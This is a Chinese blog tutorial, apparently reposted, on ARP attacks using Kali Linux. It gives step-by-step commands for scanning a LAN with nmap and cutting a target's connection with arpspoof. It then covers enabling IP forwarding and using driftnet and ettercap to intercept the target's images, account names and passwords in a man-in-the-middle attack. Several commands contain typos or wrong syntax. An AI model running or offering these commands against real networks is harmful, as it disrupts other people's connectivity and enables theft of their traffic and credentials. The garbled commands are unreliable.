Arp断网攻击,欺骗


操作依靠kali Linux实现
在我们翻开一本关于开发类的书籍的时候都会看到一句:“工欲善其事必先利其器”,这句话给我们的意思呢大概就是,要想学好编程,首先得有开发工具,接下来,我就来讲怎么安装Linux kali 系统的环境,这时候很多人会产生疑惑,不久是个系统吗直接装不就好了?为啥还要环境,由于kali系统是全root模式安全性为0,容易被病毒入侵,不利于测试,几乎很少有人把它直接装在自己的电脑硬盘上,所以这时候我们有需要一个虚拟机,(简单说一下虚拟机的概念:虚拟机它就是可以模拟各种系统运行的一个软件,通常都指-VMware)
虚拟机安装教程

接下来就需要linux kali的镜像文件进行安装到虚拟机上就ok了
注意网络模式要设为桥接!还有就是密匙网上都有!随便搜一下就永久免费啦!下面附上kali系统的安装教程。
kali系统安装教程
@子龙
当你在虚拟机中安装好了kali系统的时候(如上图所示),kali系统包含众多脚本,可以帮助我们做很多测试,下面主要介绍Arp攻击的原理及教程

ARP协议

ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。

基本功能

通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。

ARP攻击的局限性

ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行。

无法对外网(互联网、非本区域内的局域网)进行攻击。

ARP攻击的攻击原理

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

在Kali Linux环境下的实现ARP攻击

攻击环境
攻击主机:Kali Linux

IP:192.168.1.13

被攻击主机:Windows 10

IP:192.168.1.10

因为是在虚拟机环境下实现的攻击,所以要提前将虚拟机的网络适配器设置为桥接模式,这样一来虚拟机便可以单独获得一个ip地址,而不是和NAT模式下一样和宿主机共用一个ip地址。

ARP断网攻击(更多攻击手段持续更新ing)

在进行攻击的时候我们需要先知道自己的IP地址,在终端中输入ifconfig指令即可(所说的终端是kali系统中的cmd在左侧任务栏内,一般是第二个)

在知道了自己IP地址的情况下,我们同时也知道了自己所在的网段,接下来我们可以找一下当前局域网下还存在哪些主机,
如果想看自己电脑连接的那台路由器上的网管输入ipconfig查看

这里使用nmap脚本(nmap可以扫描出当前路由器下被占用的端口,通俗点讲就是这些端口都是有人在使用的!)出于道德我演示攻击自己的电脑为例子!
命令:namp -sP 192.168.1.*
后面的是网关ip,不是绝对的,网关地址在上图中可以看到


可以看到我们已经通过namp命令扫描出了当前路由器下的ip
对比上下图,我们可以发现我们的目标ip的确也是在列表中的,这个时候目标还是可以正常上网的

此时,在Kali中使用arpspoof工具实现ARP攻击
攻击命令:Arpspoof -i eth0 -t 192.168.1.10 -t 192.168.1.1
ip就是目标ip加上网关地址

这个时候的目标已经无法正常上网了

停止ARP攻击,目标就能恢复到正常上网状态
快捷键是(Ctrl+c)结束攻击!

Arp欺骗


如果arp攻击是断网,那么arp欺骗就是对数据流量的截获,其实原理很简单,就是以kali系统为目标主机向路由器说我就是你要发送信号的主机,这样kali在开启ip地址转发的情况下,上网所经的数据流量经过kali主机,kali就能对其进行图片,账号密码的截获,当然并不是能百分之百截获到,只能获取到一部分,但这样已经会造成很大的安全问题!

cat /proc/sys/net/ipv4/ip_forward

//查看kali系统是否开启了ip地址转发(其中0表示没有开起1表示开启)

echo 1 >/proc/sys/net/ipv4/ip_forward

// 临时修改kali系统开启ip地址转发(开启IP地址转发,目标主机依然可以上网,但网络质量可能会很差)

//如何使kali系统永久开启ip地址转发?

输入命令:vim /etc/sysctl.conf
找到对应的命令行,net ipv4.ip forward=1;将警号去掉即可永久生效,或者复制命令行在命令下,带警号这样就起到了注释的作用
这时候kali系统就相当于一个路由器,可以实现ip地址的转发
输入命令

arpspoof -i eth0 -t 192.168.43.129 192.168.43.5

另外在开启一个终端窗口

driftnet -i eth0

抓到本地:driftnet -i eth0 -d /home/****(路径)

2.图形化工具

ettercap -- help 查看参数

ettercap - G //进入图形化管理界面,扫描端口下存活主机,将网关IP地址加到atark1目标主机添加到atark2选择Mitm->ArP毒化

ettercap -i eth0 -Tq -M arp:remote //192.168.43.129// //192.168.43.144//

其中 tq是静态文本,M为中间人攻击,格式严谨
开启攻击---底部出现help,那么一般情况下就是启动成功了
这时候再使用driftnet -i eth0
对图片进行截获,不知道为啥但是感觉图形化工具比较好用,截获图片数量也比较多

3.获取用户登陆密码及账号

我做了靶机测试,发现并不是所有账号密码都可以截获现在很多网站采用https传输协议,即使截到了也不一定是明文,通常是通过某些特殊算法进行加密
so,懂我意思吧!

步骤,开启两个终端,输入命令

1.echo 1 >/proc/sys/net/ipv4/ip_forward(终端1)

2.arpspoof -i eth0 -t 192.168.43.129 192.168.43.5(终端1,前一个ip地址是目标ip,后一个主机地址是网关,这个语法通俗点讲就是告诉路由器我是你要发送信息的目标)

3.ettercap -Tq -i eth0(终端2,开启静态文本监听模式)

基本上输入号这三个命令就完成了对目标主机账号密码的监听,随着时代进步,手工输入密码的形式渐渐被扫描二维码登陆所代替。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM